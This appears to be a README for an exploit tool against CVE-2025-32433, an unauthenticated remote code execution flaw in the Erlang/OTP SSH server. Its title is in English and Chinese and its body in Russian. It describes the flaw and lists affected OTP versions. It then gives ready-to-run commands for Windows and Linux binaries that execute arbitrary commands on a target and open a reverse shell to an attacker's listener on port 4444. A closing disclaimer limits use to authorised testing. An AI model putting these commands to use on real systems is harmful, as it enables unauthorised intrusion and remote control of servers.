
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
Серьезная уязвимость была обнаружена в SSH-сервере Erlang/OTP, которая может позволить злоумышленнику выполнить неаутентифицированное удаленное выполнение кода (RCE). Используя недостаток в обработке сообщений протокола SSH, злоумышленник может получить несанкционированный доступ к уязвимым системам и выполнять произвольные команды без действительных учетных данных. Это может привести к компрометации указанных хостов, позволяя третьим лицам получить несанкционированный доступ и манипулировать конфиденциальными данными, либо вызвать атаки типа «отказ в обслуживании».
OTP-27.3.2 и более ранние
OTP-26.2.5.10 и более ранние
OTP-25.3.2.19 и более ранние
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

При использовании данного инструмента соблюдайте соответствующие законы и нормативные акты, убедитесь, что тестирование и использование проводятся в авторизованной среде.
Данный инструмент предназначен только для образовательных и исследовательских целей, любые злоупотребления будут осуществляться пользователем на свой страх и риск.